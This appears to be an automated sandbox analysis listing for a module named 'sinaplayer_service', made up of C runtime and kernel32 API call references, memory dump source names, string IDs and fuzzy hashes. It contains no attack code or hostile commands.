                                                                                                                                                                                                    • _get_daylight.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096067
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D096079
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?,00000190,00000190,00000000,?,?), ref: 6D09608B
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,?,6D0D4437,000007BC,00000001,00000001,00000000), ref: 6D096195
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000190,00000190,00000000,?,?), ref: 6D0D69D6
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000190,00000190,00000000,?,?), ref: 6D0D69DC
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000000,00000000,00000190,00000190,00000000,?,?), ref: 6D0D69E6
                                                                                                                                                                                                      • Part of subcall function 6D095BB2: _lock.MSVCR120(00000006,6D095BF0,0000000C,6D096173,?,00000000,?,0000003C,00000000,00000000,?,0000003C,00000000,-FFFFF984,?,00000018), ref: 6D095BC4
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_get_daylight_get_dstbias_get_timezone_invalid_parameter_noinfo_invoke_watson_lock
                                                                                                                                                                                                    • String ID: ;$;$d
                                                                                                                                                                                                    • API String ID: 106357551-2894727285
                                                                                                                                                                                                    • Opcode ID: ba9b653d8b88bf69496105ea866245dc3f007154873db99df76962db9a5a59cf
                                                                                                                                                                                                    • Instruction ID: 1ba2e6b9a25c7e732a477041d0feeeeb901bebeafbe46a0eb068edb5a8c86b48
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba9b653d8b88bf69496105ea866245dc3f007154873db99df76962db9a5a59cf
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A57105B1E002199BEB14CF7DDC807EEB3F9AB48360F599126F914EB280E77099048BD0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • atol.MSVCR120(00000001,00000001,00000010,FFFFFEFF,?,00000000), ref: 6D0DD947
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6D0DD95D
                                                                                                                                                                                                    • DName::operator=.LIBCMT ref: 6D0DD96C
                                                                                                                                                                                                    • DName::DName.LIBCMT ref: 6D0DD97F
                                                                                                                                                                                                    • DName::operator+.LIBCMT ref: 6D0DD986
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator=$NameName::Name::operator+atol
                                                                                                                                                                                                    • String ID: generic-type-$template-parameter-
                                                                                                                                                                                                    • API String ID: 1861674852-13229604
                                                                                                                                                                                                    • Opcode ID: ce6ed807e92089416a3e926c59d0495409598859c492fd6c099a089e20fd778d
                                                                                                                                                                                                    • Instruction ID: be68e97d81f9c36aa835d0c839ffa52e406e729564fd221311f7ea3133ac7612
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ce6ed807e92089416a3e926c59d0495409598859c492fd6c099a089e20fd778d
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B617E71D4420A9FEB04DFF9D850FFEB7B8AF09300F15402AE911A7291EB759A04CB60
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(0]m,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0AC364
                                                                                                                                                                                                    • _write.MSVCR120(00000000,?,00000000,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0AC3D1
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0AC4E0
                                                                                                                                                                                                    • __p__iob.MSVCR120(00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0B13B7
                                                                                                                                                                                                    • __p__iob.MSVCR120(00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0B13C7
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0D51F6
                                                                                                                                                                                                    • __lseeki64.LIBCMT(00000000,00000000,00000000,00000002,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0D5236
                                                                                                                                                                                                    • _write.MSVCR120(00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0D5257
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __p__iob_errno_write$__lseeki64_fileno
                                                                                                                                                                                                    • String ID: 0]m
                                                                                                                                                                                                    • API String ID: 1504050362-866580982
                                                                                                                                                                                                    • Opcode ID: 6a3af94d99f7a64e1e004a9ec2a93a335ad56eaac5ce5e65800856e5842bc571
                                                                                                                                                                                                    • Instruction ID: 0fcd4f1b62c3474c82a2a5814edebbba3d6ef1504c68523c94ac5f770ad352f5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a3af94d99f7a64e1e004a9ec2a93a335ad56eaac5ce5e65800856e5842bc571
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E411676518B069FF7158EA8C880B7B77E4EF47320B09C61EE9B68B2D1D734D4408B55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,00000001), ref: 6D0A79E7
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(6D0E7870), ref: 6D0D291E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CEE8,6D0E7870), ref: 6D0D2933
                                                                                                                                                                                                      • Part of subcall function 6D0A4EB3: __EH_prolog3.LIBCMT ref: 6D0A4EBA
                                                                                                                                                                                                      • Part of subcall function 6D0A4EB3: ??2@YAPAXI@Z.MSVCR120(000000D0), ref: 6D0A4ED9
                                                                                                                                                                                                      • Part of subcall function 6D0A4EB3: free.MSVCR120(00000000), ref: 6D0A4EFC
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@CriticalExceptionH_prolog3LeaveSectionThrowfreestd::exception::exception
                                                                                                                                                                                                    • String ID: <)m$version
                                                                                                                                                                                                    • API String ID: 2663953338-2428076522
                                                                                                                                                                                                    • Opcode ID: 38aafc5acfced8a6b13b993d7e8b6ab8e29a65295cd0ea826b6965d88f9eae98
                                                                                                                                                                                                    • Instruction ID: 4962306c87e2485ca58c16174ca0587943d6e06ff79a6dc0ece7c7d574512d24
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38aafc5acfced8a6b13b993d7e8b6ab8e29a65295cd0ea826b6965d88f9eae98
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD416970A0430AEFEB55CFA5C485BADBBB4FF05304F14802AE9199B256D7B0E961CF91
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?,.im), ref: 6D0A6C19
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120 ref: 6D0D24B7
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CFD8), ref: 6D0D24D2
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002,00000001), ref: 6D0D24D8
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000,?,6D0A69B0,00000002), ref: 6D0D24EE
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,00000000,00000000,?,?,?,?,6D0A58C9,00000004,6D0A692E,?,00000000), ref: 6D0D24FC
                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6D0D250A
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000), ref: 6D0D251B
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(00000008,00000000), ref: 6D0D2544
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??2@ExceptionThrow$??0exception@std@@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCurrentErrorLastThreadVersion
                                                                                                                                                                                                    • String ID: .im
                                                                                                                                                                                                    • API String ID: 124800099-4014146257
                                                                                                                                                                                                    • Opcode ID: 160199be45a413335e26d9c2875f0db246ca16423133ca6586cfa6ea316e8f5a
                                                                                                                                                                                                    • Instruction ID: 2fa314308d966a2c9917683d8dbf7b6ffe54032af3cfbb5fff1a3745411099b5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160199be45a413335e26d9c2875f0db246ca16423133ca6586cfa6ea316e8f5a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB41FD7081821A8FFB60DFB8E8947BE77B4FB0AB04F41815BE605D7185EB748840CB90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: operator+
                                                                                                                                                                                                    • String ID: cli::array<$cli::pin_ptr<$void$void
                                                                                                                                                                                                    • API String ID: 3839230940-456688812
                                                                                                                                                                                                    • Opcode ID: c00f9106503b27e008313f4f5e8e481ec53e30d2d5ea91b279391460016a1b99
                                                                                                                                                                                                    • Instruction ID: f35116303e4d7c0dee7b9d853561b26eef71f4815b312d928dad9c726ebd0192
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c00f9106503b27e008313f4f5e8e481ec53e30d2d5ea91b279391460016a1b99
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5F216B3151C209AFEF05CF98D950FEE3BB9BF0A318F44805AFA18A7291D7719A50CB94
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCR120(?,000000FF,00000024), ref: 6D0978AF
                                                                                                                                                                                                    • _get_daylight.MSVCR120(?), ref: 6D0978EA
                                                                                                                                                                                                    • _get_dstbias.MSVCR120(?), ref: 6D0978FC
                                                                                                                                                                                                    • _get_timezone.MSVCR120(?), ref: 6D09790E
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(?,?), ref: 6D097942
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(?,?), ref: 6D09796C
                                                                                                                                                                                                    • _gmtime64_s.MSVCR120(?,?), ref: 6D097989
                                                                                                                                                                                                      • Part of subcall function 6D0976C5: memset.MSVCR120(?,000000FF,00000024), ref: 6D0976E3
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6A84
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0D6A8E
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6A9A
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0D6C07
                                                                                                                                                                                                      • Part of subcall function 6D12469B: IsProcessorFeaturePresent.KERNEL32(00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000,00000000,00000000,00000000,6D0FB412), ref: 6D12469D
                                                                                                                                                                                                      • Part of subcall function 6D12469B: __crtTerminateProcess.MSVCR120(C0000417,00000002,C0000417,00000001,?,00000017,6D12466F,?,?,?,?,?,?,6D12467C,00000000,00000000), ref: 6D1246BC
                                                                                                                                                                                                    Memory Dump Source
• Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _gmtime64_s$_errnomemset$FeaturePresentProcessProcessorTerminate__crt_get_daylight_get_dstbias_get_timezone_invalid_parameter_noinfo_invoke_watson
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2714158224-0
                                                                                                                                                                                                    • Opcode ID: 3ec8e3e4a560eb1711b817554574e81bdaf72ebdba6a9da9e7fbee5e7d11d69b
                                                                                                                                                                                                    • Instruction ID: e9a2493b598d66ed0b81e6abf14f01c82a53a02913cf5318ac5d04333d7b7c00
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ec8e3e4a560eb1711b817554574e81bdaf72ebdba6a9da9e7fbee5e7d11d69b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A81B572E04707AAF7149E7DCC41BAAB3E8EF45728F51922AE514DB280E7B0D9409BD0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
• Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmp
• Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_ismbblead_l$_invalid_parameter_noinfo$strncat_s
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1948258708-0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 6D0F230C
                                                                                                                                                                                                    • free.MSVCR120(000000FF,?,00000024,000000FF,6D0E8C43,00000008,6D0F00EC), ref: 6D0F234D
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(000000FF,?,00000028,000000FF,6D0EF81C,00000008,6D0F00EC), ref: 6D0F237C
                                                                                                                                                                                                    • free.MSVCR120(?,00000008,6D0F00EC), ref: 6D0F2385
                                                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,00000008,6D0F00EC), ref: 6D0F239D
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000008,6D0F00EC), ref: 6D0F23AC
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0F23B1
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6D0F23C0
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0F23C5
                                                                                                                                                                                                    • free.MSVCR120(?,?), ref: 6D0F23CD
                                                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 6D0F23E4
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$CloseFreeHandle$CriticalDeleteH_prolog3HeapSectionVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3338787333-0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: ...$`template-parameter$void
                                                                                                                                                                                                    • API String ID: 0-2152273162
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000000,e+000,?), ref: 6D09BE93
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000,0000002D,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000002), ref: 6D0E0F33
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,00000000,00000000), ref: 6D0E0F43
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,00000000,00000000,0000002D,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000002), ref: 6D0E0F4D
                                                                                                                                                                                                    • memmove.MSVCR120(00000002,00000003,00000003,?,00000000,00000000), ref: 6D0E0F9F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$_getptd_invalid_parameter_noinfomemmovestrcpy_s
                                                                                                                                                                                                    • String ID: e+000
                                                                                                                                                                                                    • API String ID: 586226928-1027065040
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • `non-type-template-parameter, xrefs: 6D0DC7BA
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: NameName::
                                                                                                                                                                                                    • String ID: `non-type-template-parameter
                                                                                                                                                                                                    • API String ID: 1333004437-4247534891
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,6D0ACD86), ref: 6D0ACDCA
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000004,00000000,?,6D0ACD86), ref: 6D0ACDE0
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,?,00000000,?,6D0ACD86), ref: 6D0ACE00
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(00000001,00000001,?,00000000,?,6D0ACD86), ref: 6D0ACE11
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,00000001,00000000,?,00000000,?,6D0ACD86), ref: 6D0ACE25
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,?,6D0ACD86), ref: 6D0ACE46
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc_crtstrlen$freestrcpy_s
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 1244768049-3401207301
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsrchr.MSVCR120(6D095ECA,0000002E,00000000,?,?,6D095ECA,00000400,?), ref: 6D0961FA
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.exe,00000000,?,?,6D095ECA,00000400,?), ref: 6D09620D
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.cmd,00000000,?,?,6D095ECA,00000400,?), ref: 6D09621E
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.bat,00000000,?,?,6D095ECA,00000400,?), ref: 6D09622F
                                                                                                                                                                                                    • _wcsicmp.MSVCR120(00000000,.com,00000000,?,?,6D095ECA,00000400,?), ref: 6D096240
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcsicmp$wcsrchr
                                                                                                                                                                                                    • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                    • API String ID: 2496260227-4019086052
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0A035C
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE7D9
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE7E0
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE7ED
                                                                                                                                                                                                      • Part of subcall function 6D094206: EnterCriticalSection.KERNEL32(-0000000C,6D094260,00000008,6D0A02F5,00000000,6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30), ref: 6D09424C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000), ref: 6D0DE7F7
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000), ref: 6D0DE802
                                                                                                                                                                                                      • Part of subcall function 6D0A0189: _isatty.MSVCR120(?,00000000,00000000,00000000), ref: 6D0A0222
                                                                                                                                                                                                      • Part of subcall function 6D0A0189: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 6D0A0263
                                                                                                                                                                                                      • Part of subcall function 6D0A0354: __unlock_fhandle.LIBCMT ref: 6D0A0355
                                                                                                                                                                                                    • _errno.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE81F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30,00000000,?), ref: 6D0DE82A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno$_errno$CriticalEnterFileSectionWrite__unlock_fhandle_invalid_parameter_noinfo_isatty
                                                                                                                                                                                                    • String ID: 0]m
                                                                                                                                                                                                    • API String ID: 2104561730-866580982
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _fileno.MSVCR120(?,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30,0000000C), ref: 6D0AFA78
                                                                                                                                                                                                    • _lseek.MSVCR120(00000000,00000000,00000001,?,?,?,?,6D0AFA11,?,?,?,?,?,?,?,6D0AFA30), ref: 6D0AFA95
                                                                                                                                                                                                    • _lseek.MSVCR120(?,00000000,00000002), ref: 6D0B1B0C
